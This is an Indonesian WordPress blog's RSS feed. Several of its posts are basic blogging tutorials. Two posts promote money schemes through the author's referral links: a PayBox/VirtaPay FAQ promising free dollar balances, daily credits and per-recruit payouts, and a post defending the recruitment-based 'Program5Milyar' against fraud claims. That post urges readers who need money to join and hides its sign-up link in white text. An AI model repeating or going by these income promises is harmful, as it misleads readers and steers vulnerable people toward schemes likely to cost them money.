<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>Fikforfun&#039;s Blog</title>
	<atom:link href="http://fikforfun.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://fikforfun.wordpress.com</link>
	<description>...hanya untuk bersenang-senang</description>
	<lastBuildDate>Fri, 29 Jul 2011 13:05:58 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='fikforfun.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://s2.wp.com/i/buttonw-com.png</url>
		<title>Fikforfun&#039;s Blog</title>
		<link>http://fikforfun.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://fikforfun.wordpress.com/osd.xml" title="Fikforfun&#039;s Blog" />
	<atom:link rel='hub' href='http://fikforfun.wordpress.com/?pushpress=hub'/>
		<item>
		<title>PERTANYAAN YANG SERING MUNCUL SEPUTAR PAYBOX / VIRTAPAY</title>
		<link>http://fikforfun.wordpress.com/2011/06/29/pertanyaan-yang-sering-muncul-seputar-paybox-virtapay/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/29/pertanyaan-yang-sering-muncul-seputar-paybox-virtapay/#comments</comments>
		<pubDate>Wed, 29 Jun 2011 13:09:19 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=377</guid>
		<description><![CDATA[PERTANYAAN YANG SERING MUNCUL SEPUTAR PAYBOX / VIRTAPAY 1.postingan kali ini akan membahas  seputar pertnyaan2 dari sobat2 yg belom faham tentang virtapay .dibawah ini penjelasan singkat mengenai  virtapay teruslah membaca sampai ahir . 2. apaan tuh VIRTAPAY ???? PAYBOX / VIRTAPAY : mata uang online dan layanan proses pembayaran untuk melakukan transaksi jual beli online [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=377&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<h3>PERTANYAAN YANG SERING MUNCUL SEPUTAR PAYBOX / VIRTAPAY</h3>
<p><strong>1.postingan kali ini akan membahas  seputar pertnyaan2 dari sobat2 yg belom faham tentang virtapay .dibawah ini penjelasan singkat mengenai  virtapay teruslah membaca sampai ahir .</strong></p>
<p><strong>2. </strong><strong>apaan tuh VIRTAPAY ????</strong><br />
<strong>PAYBOX / VIRTAPAY</strong> : mata uang online dan layanan proses pembayaran untuk melakukan transaksi jual beli online lebih mudah, lebih aman dan tersedia untuk semua orang.</p>
<p><strong>3. </strong><strong>apa fungsi dari VIRTAPAY ???</strong><br />
Saat ini akun <strong>VIRTAPAY</strong> hanya bisa dipakai untuk transaksi orang ke orang, namun demikian, kedepan fungsi <strong>VIRTAPAY</strong> jauh lebih dari itu, yang sedang dalam tahap pengembangan saat ini adalah :</p>
<ul>
<li>Mudah membeli dan menjual menggunakan akun <strong>VIRTAPAY</strong>.</li>
<li>Mudah mengirim dan menerima uang menggunakan account <strong>VIRTAPAY</strong>.</li>
<li>Pembelian dari hampir semua merchant online.</li>
<li>Menarik untuk hampir semua rekening bank di seluruh dunia.</li>
<li>Mungkin menarik untuk lainnya prosesor pembayaran online.</li>
<li>integrasi Usaha Kecil, termasuk modul proses pembayaran untuk semua software shopping online</li>
<li>integrasi dengan Bisnis tingkat menengah.</li>
<li>Integrasi dengan Online Store besar.</li>
<li>Kartu Debit PayBox yang terhubung ke account Anda</li>
<li>pertukaran Mata Uang dengan semua mata uang utama dunia <a name="more"></a></li>
</ul>
<p><strong>4. </strong><strong>kapan akun </strong><strong>VIRTAPAY</strong><strong> bisa mulai dipergunakan ???</strong><br />
akun <strong>VIRTAPAY</strong> bisa mulai dipergunakan dan berfungsi penuh sebagai <strong><em>virtual currency</em></strong> jika sudah launching <strong>(OPEN BOX</strong>). Saat ini masih pre-launching (<strong>CLOSED BOX</strong>), jadi sementara hanya bisa dipergunakan transaksi orang ke orang (person to person). launching (OPEN BOX) baru bisa dilakukan jika sudah tercapai taget jumlah member mencapai 2 – 5 juta orang di seluruh dunia.</p>
<p><strong>5. </strong><strong>Mengapa anda harus membuat akun </strong><strong>VIRTAPAY</strong><strong> sekarang &#8230; </strong></p>
<ul>
<li>Anda mulai dengan saldo $ 25 dan gratis.</li>
<li>PayBox akan menambah hingga $ 20 per hari ke dalam account Anda untuk berpartisipasi sebagai bagian untuk mempersiapkan peluncuran layanan baru kami.</li>
<li>Anda mendapatkan $ 10 per orang yang Anda ajak bergabung dengan PayBox.</li>
<li>Anda akan menjadi pengguna EarlyBird sebelum <strong>VIRTAPAY</strong> terbuka untuk umum.</li>
<li>Anda akan membantu membentuk pengembangan sistem pembayaran terbaik yang pernah dirancang untuk Internet.</li>
<li>Anda bisa memiliki ratusan atau ribuan dolar dalam account Anda pada saat kita memulai, tanpa pernah membuat deposit!</li>
</ul>
<p><strong>6. </strong><strong>bagaimana Caranya Mendaftar di </strong><strong>VIRTAPAY</strong><strong> ?</strong><br />
Berikut urutan mendaftar PAYBOX, yg blm berhasil, tentu ada urutan yg terlewati/ msh salah, untuk memulai silahkan klik <a href="http://www.virtapay.com/r/sofyantoro">DISINI</a></p>
<ul>
<li>muncul halaman utama <strong>VIRTAPAY</strong>, terus CLICK HERE TO JOINT NOW</li>
<li>masukkan / pilih username anda suka ( akan digunakan seterusnya untuk login ke wec VIRTAPAY ), tapi jangan pake spasi, harus kata sambung / satukata (boleh dg kombinasi angka)</li>
<li>masukkan email anda.</li>
<li>masukkan email anda lagi (emailnya harus sama)</li>
<li>masukkan/ pilih password (angka saja yg mudah diingat hanya oleh anda) yg anda suka</li>
<li>beri tanda centang (v) pada kotak kecil i agree to terms of service (setuju aturan <strong>VIRTAPAY</strong>)</li>
<li>klik continue</li>
<li>masukkan email lagi pada kolom seperti email yg diatas</li>
<li>masukkan kode captcha sesuai karakter yg ada di sebelah</li>
<li>oke</li>
<li>buka/ masuk email anda yg diatas</li>
<li>konfirmasi/ verifikasi email yg dari feedburner paybox</li>
<li>buka halaman paybox dg alamat http://www.virtapay.com/</li>
<li>masukkan username yg anda pilih di atas pada isian username</li>
<li>masukkan password anda yg anda pilih diatas tadi pada isian password</li>
<li>anda masuk di account paybox anda, di dalam sudah ada saldo dollar sebesar $25</li>
</ul>
<p>Demikian ringkasan saya, semoga bisa membantu teman – teman yang masih bingung kenapa anda masuk di grup I LOVE PAYBOX. Anda patut berterima kasih kepada teman anda yang mau menambahkan anda ke grup I LOVE PAYBOX, tidak semua orang mendapatkan kesempatan emas ini</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/377/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/377/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/377/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/377/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/377/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/377/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/377/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/377/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=377&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/29/pertanyaan-yang-sering-muncul-seputar-paybox-virtapay/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>
	</item>
		<item>
		<title>Bicara Soal Bisnis Online &#8216;Program5Milyar&#8217;</title>
		<link>http://fikforfun.wordpress.com/2011/06/25/bicara-soal-bisnis-online-program5milyar/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/25/bicara-soal-bisnis-online-program5milyar/#comments</comments>
		<pubDate>Fri, 24 Jun 2011 19:09:11 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=369</guid>
		<description><![CDATA[Penipuan?? Coba pikir lagi Berikut kutipan comment yg mendukung bisnis 5 milyar bukan penipuan&#8230; dan gw 98 % setuju dengan yg diutarakan&#8230; silahkan dibaca  BISNIS 5 MILYAR “&#8230;.Kalau gw lihat si Penulis atau siapapun yg mendukung-nya terlalu skeptis dalam berpikir. Gw punya uang yg gw investasikan ke banyak tempat ( Saham, rekasadana, deposito dll). tapi [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=369&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<div><strong>Penipuan?? Coba pikir lagi</strong></div>
<div>Berikut kutipan comment yg mendukung bisnis 5 milyar bukan penipuan&#8230; dan gw 98 % setuju dengan yg diutarakan&#8230; silahkan dibaca<img title="I Love Indonesia" src="http://static.kaskus.us/images/smilies/I-Luv-Indonesia.gif" alt="" border="0" /> <img title="I Love Kaskus" src="http://static.kaskus.us/images/smilies/s_sm_ilovekaskus.gif" alt="" border="0" /></div>
<div><a href="http://www.prog5milyar.com/?id=sofyantoro"><strong>BISNIS 5 MILYAR</strong></a></div>
<div>“&#8230;.Kalau gw lihat si Penulis atau siapapun yg mendukung-nya terlalu skeptis dalam berpikir. Gw punya uang yg gw investasikan ke banyak tempat ( Saham, rekasadana, deposito dll). tapi gw ga ngelihat kalo Bisnis5M ini sebagai ajang buat penipuan (secara core bisnis-nya), kalo buat gw ini buat Income for Fun aja, dan kalo gw rajin dan bisa pengaruhin orang lain ya gw dapat untung (dan itu terjadi). Dan kalo gw lihat fokus bisnis dari Bisnis5M ini sperti MLM bukan ke arah ebook-nya. Sorry bukannya mau berdebat, kita ga bakalan tahu bahwa investasi kita menguntungkan Sblm kita mulai meng-investasikan sesuatu, dan bekerja keras buat investasi tersebut. kalo dalam bisnis, uang 180 rb itu cuma nilai investasi yg kecil jadi sense of loss-nya pun kecil. Coba loe lihat dari para bisnis-man yg investasiin uang-nya sampai ratusan juta, milyar dan akhir-nya rugi, is it make them lost, i think they don’t. Because that is part of lesson learn in business.”</div>
<div>“&#8230;..Justru kalo gw lihat disitulah sisi skeptis diri anda. makanya ga ngerti segi bisnis. Anggap aja itu bagian dari investasi kita. dalam case Bisnis5M yg di sebut penipuan kalo komisi yg seharusnya kt dapatkan dari setiap member level yg daftar dibawah kita tidak di berikan ke kita. kalo masih di kasih, dimana sisi penipuannya ? Ingat mas, kita nabung di bank aja hitungannya masih rugi (ga sesuai inflasi), tapi kenapa loe tetap tabungan duit loe di bank ? emang loe ga ngerasa kena tipu karena bunga-nya dibawah nilai inflasi ? itulah bentuk segi investasi. Sekarang gw tanya sama loe, Investasi apa aja sih yg udah loe lakukan, baru deh loe bisa bicara banyak. kalau cuma sekedar ngomong mah banyak orang yg bisa ngomong.”</div>
<div>“&#8230;..Mas, yg namanya penipuan pasti dirasakan langsung sama member-nya, sekarang what is the root cause of this, mungkin karena kita berpikir bahwa kita takut di tipu, setelah memasukkan uang kita dan kita cari member di bawah kita eh uang-nya ga di transfer ke kita. that’s the point….. nah sekali lg gw tanya, kalau kenyataan-nya hal itu nggak terjadi, apakah langsung kita generalisir penipuan ??? Ingat sekali lagi core bisnis ini apa dulu ? kalau selama apa yg kita cari kita dapatkan, kenapa di sebut penipuan ? hal-hal lain yg anda sebutkan bukan sebagai core bisnis ini, ebook mah ga di pandang mas, kalau ebook banyak tuh gratisan, cari aja di google. dan saya rasa owner dari Bisnis5M masih punya hati nurani yg baik, sudah dua kali Web-nya down karena masalah capacity, tapi dia tetap berbaik hati utk meng-upgrade capacity-nya agar bisa di gunakan lagi (sampai ada dot net), kalau memang dia ga punya hati nurani, udah pasti ditinggalin karena dia pasti udah untung. Sorry ya mas, saya tuh bukan emosi tapi memang gaya ngomong saya seperti ini. bicara secara blak-blakan.”</div>
<div>“&#8230;&#8230;.Ada juga loe yg ga waras, memang uang 180 rb cuma loe taruh gitu aja. ya loe berusaha donk utk cari member dibawah loe sebanyak-banyak-nya baru loe bisa dapat komisi yg lebih banyak. Loe pernah baca artikel ga kalo sebenarnya kalo seluruh uang di seluruh dunia di kumpulin jadi satu dan di bagi sama rata ke semua orang, setiap orang bisa jadi orang kaya ??? tapi kenyataan-nya nggak kan, loe jadi berhasil ato nggak ya tergantung loe bung, jangan berharap banyak kalo loe ga kerja keras.”</div>
<div>gimana? setuju ngga? Kalo saran gw sih, kalo mo baca website nya akan lebih bagus lagi&#8230;tapi inget!!! Kalo lo mo baca, lo harus baca sampai habis dan secara keseluruhan, karena hasil analisa gw membuktikan bahwa 65% org malas membacanya karena terlalu banyak huruf dan tidak menarik sehingga pesan tidak sampai dengan maksimal yang kemudian menimbulkan pemahaman yg sama sekali berbeda. Dan satu lagi, kalo saat ini lo sedang ngga tertarik dengan yg namanya bisnis, ato sedang ga perlu uang ( lagi banyak duit) gw sarankan ngga buka dan ngga usah baca web nya, karena hasrat lo sedang ngga ngendukung saat ini, so next time aja kalo lagi kepepet butuh duit ato lagi bergairah nyari bisnis buat sambilan.</div>
<div>Saya merekomendasikan Anda untuk bergabung dalam program5milyar ini, hasil yang bisa Anda dapatkan cukup besar, jujur saja saya juga merupakan member dalam program ini, Jadi untuk Anda yang lagi tidak butuh uang dan merasa tidak ingin ikutan silahkan ditutup artikel ini dan bagi Anda yang merasa bermanfaat dan sangat butuh uang, saya sangat menyarankan Anda untuk bergabung dalam program ini, karena saya sendiripun sudah mendapatkan uang dari program ini, dan saya ingin berbagi kepada Anda, agar keuangan Anda lebih baik dari sebelumnya, &#8216;bisnis ini sama sekali tidak menipu karena Anda-lah yang akan mengatur penghasilan&#8217;.</div>
<p><span style="font-family:Verdana;"><span style="color:#0000ff;"><span style="color:#ffffff;">Tertarik?? kunjungi website-nya <a href="http://www.prog5milyar.com/?id=sofyantoro"><span style="color:#ffffff;">disini</span></a></span><strong><br />
</strong></span></span></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/369/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/369/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/369/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=369&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/25/bicara-soal-bisnis-online-program5milyar/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://static.kaskus.us/images/smilies/I-Luv-Indonesia.gif" medium="image">
			<media:title type="html">I Love Indonesia</media:title>
		</media:content>

		<media:content url="http://static.kaskus.us/images/smilies/s_sm_ilovekaskus.gif" medium="image">
			<media:title type="html">I Love Kaskus</media:title>
		</media:content>
	</item>
		<item>
		<title>Panduan WordPress.com resmi (edisi English)</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/panduan-wordpress-com-resmi-edisi-english/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/panduan-wordpress-com-resmi-edisi-english/#comments</comments>
		<pubDate>Tue, 14 Jun 2011 07:46:41 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tutorial Wordpress]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=366</guid>
		<description><![CDATA[Setelah sekian lama, wordpress.com akhirnya mengeluarkan panduan wordpress.com resmi. Alamatnya ada di learn.wordpress.com. Berdasarkan informasi yang ada di halaman ini, learn.wordpress.com diperuntukkan untuk orang-orang sebagai berikut: * Wants to create a blog but isn’t quite sure where to start * Needs help choosing a blog topic * Wants to better understand how blogging works * [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=366&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Setelah sekian lama, wordpress.com akhirnya mengeluarkan panduan wordpress.com resmi. Alamatnya ada di learn.wordpress.com. Berdasarkan informasi yang ada di halaman ini, learn.wordpress.com diperuntukkan untuk orang-orang sebagai berikut:</p>
<p>* Wants to create a blog but isn’t quite sure where to start<br />
* Needs help choosing a blog topic<br />
* Wants to better understand how blogging works<br />
* Is interested in attracting more blog visitors</p>
<p>Kilas balik sejenak. Saat blog panduan.wordpress.com dibuat, seingat saya baru ada fitur FAQ, dokumentasi dan support saja dari wordpress.com. Setelah lahirnya blog ini, kemudian baru muncul forum wordpress.com berbahasa Indonesia (resmi), blog-blog sejenis ini (bukan resmi wp.com), dan wordpress tv (resmi).</p>
<p>Well, dengan adanya learn.wordpress.com, semoga resources untuk belajar tentang wordpress semakin banyak.</p>
<p><em>source: http://panduan.wordpress.com/2011/01/30/panduan-wordpress-com-resmi-edisi-english/</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/366/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/366/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/366/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/366/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/366/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/366/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/366/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/366/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=366&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/panduan-wordpress-com-resmi-edisi-english/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>
	</item>
		<item>
		<title>Tutorial WordPress: Menambah Link Blog</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/tutorial-wordpress-menambah-link-blog/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/tutorial-wordpress-menambah-link-blog/#comments</comments>
		<pubDate>Tue, 14 Jun 2011 07:28:15 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tutorial Wordpress]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=364</guid>
		<description><![CDATA[Saat belajar ngeblog di wordpress beberapa tahun lalu, aku membaca artikel tentang pentingnya memperoleh backlink. Backlink ini adalah link dari blog lain yang mengarah ke blog kita. Adapun cara gampang memperoleh backlink ini adalah dengan berkomentar di blog yang berlabel “dofollow blog”. Cara lainnya adalah tukar link dengan blog lain. Untuk berkomentar, sebagai newbie sekalipun, [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=364&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p><img src="http://bel4j4r.files.wordpress.com/2010/08/tips-wordpress.jpg?w=150&#038;h=150&#038;h=150" alt="" width="150" height="150" align="left" />Saat belajar ngeblog di wordpress beberapa tahun lalu, aku membaca artikel tentang pentingnya memperoleh backlink. Backlink ini adalah link dari blog lain yang mengarah ke blog kita. Adapun cara gampang memperoleh backlink ini adalah dengan berkomentar di blog yang berlabel “dofollow blog”. Cara lainnya adalah tukar link dengan blog lain.</p>
<p>Untuk berkomentar, sebagai newbie sekalipun, bagiku tidaklah masalah. Namun untuk bertukar link, aku merasa kebingungan, <strong>bagaimana caranya memasang link blog</strong> lain di blog aku? Akhirnya, dengan sedikit mencari-cari artikel di internet, aku dapat menemukan jawabannya.</p>
<p>Saat ini, ada beberapa teman yang menanyakan bagaimana caranya bertukar link? bagaimana caranya memasang link blog orang lain di blog kita? Dan untuk membantu teman-teman yang mungkin membutuhkan panduan cara memasang link, berikut akan aku tuliskan pengalamanku disini.</p>
<p>Sebelum mulai memasang link, pertama-tama tentukan dulu dimana tempat kita akan menaruh “koleksi link” dari teman-teman kita. Sebagai contoh di blog ini, aku menaruh link di sidebar sebelah kanan, dengan judul Friend List.</p>
<p>1. masuk ke dashboard wordpress<br />
2. cari bagian Appearance di sidebar kiri, trus klik link widget<br />
3. tambahkan widget “Text” (klik dan seret widget Text di bagian tengah halaman ke bagian kanan, akan terbuka kotak teks baru.<br />
4. isikan pada bagian judul dengan kehendak anda, dalam blog ini aku memberinya judul Friend List.<br />
5. pada body teks, isikan dengan kode berikut :<br />
&lt;ul&gt;<br />
&lt;li&gt;&lt;a href=”http://bewegaleri.wordpress.com“&gt;Zona Berbagi Informasi&lt;/a&gt;&lt;/li&gt;<br />
&lt;li&gt;&lt;a href=”http://bel4j4r.wordpress.com“&gt;Belajar WordPress&lt;/a&gt;&lt;/li&gt;<br />
&lt;li&gt;&lt;a href=”http://hapebewe.blogspot.com“&gt;My Cellular Corner&lt;/a&gt;&lt;/li&gt;<br />
&lt;li&gt;&lt;a href=”http://filegratis2u.blogspot.com“&gt;Berbagi File Gratis&lt;/a&gt;&lt;/li&gt;<br />
&lt;li&gt;&lt;a href=”url-link“&gt;anchor teks&lt;/a&gt;&lt;/li&gt;<br />
&lt;/ul&gt;</p>
<p>6. ganti tulisan warna merah (url/alamat blog), sesuai dengan url blog yang akan kamu pasang, ganti tulisan warna biru (anchor text) dengan tulisan yang ingin ditampilkan di blog kamu. tambah atau kurangi link pada contoh di atas sesuai kebutuhan.</p>
<p>7. simpan pekerjaan anda. Kini anda sudah punya koleksi link dan mulailah berburu tukar link untuk meningkatkan rangking blog.</p>
<p>&nbsp;</p>
<p><em>source: http://bel4j4r.wordpress.com/2011/04/11/tutorial-wordpress-menambah-link-blog/</em></p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/fikforfun.wordpress.com/364/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/fikforfun.wordpress.com/364/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/fikforfun.wordpress.com/364/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/fikforfun.wordpress.com/364/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/fikforfun.wordpress.com/364/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/fikforfun.wordpress.com/364/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/fikforfun.wordpress.com/364/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/fikforfun.wordpress.com/364/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=fikforfun.wordpress.com&amp;blog=11163239&amp;post=364&amp;subd=fikforfun&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://fikforfun.wordpress.com/2011/06/14/tutorial-wordpress-menambah-link-blog/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<georss:point>0.000000 0.000000</georss:point>
		<geo:lat>0.000000</geo:lat>
		<geo:long>0.000000</geo:long>
		<media:content url="http://0.gravatar.com/avatar/208ad5118f78b0c91b63181dc9c590a6?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">fikforfun</media:title>
		</media:content>

		<media:content url="http://bel4j4r.files.wordpress.com/2010/08/tips-wordpress.jpg?w=150&#038;h=150&#038;h=150" medium="image" />
	</item>
		<item>
		<title>Apa sih Widget itu?</title>
		<link>http://fikforfun.wordpress.com/2011/06/14/apa-sih-widget-itu/</link>
		<comments>http://fikforfun.wordpress.com/2011/06/14/apa-sih-widget-itu/#comments</comments>
		<pubDate>Tue, 14 Jun 2011 04:12:30 +0000</pubDate>
		<dc:creator>fikforfun</dc:creator>
				<category><![CDATA[Internet]]></category>
		<category><![CDATA[Tutorial Wordpress]]></category>

		<guid isPermaLink="false">http://fikforfun.wordpress.com/?p=360</guid>
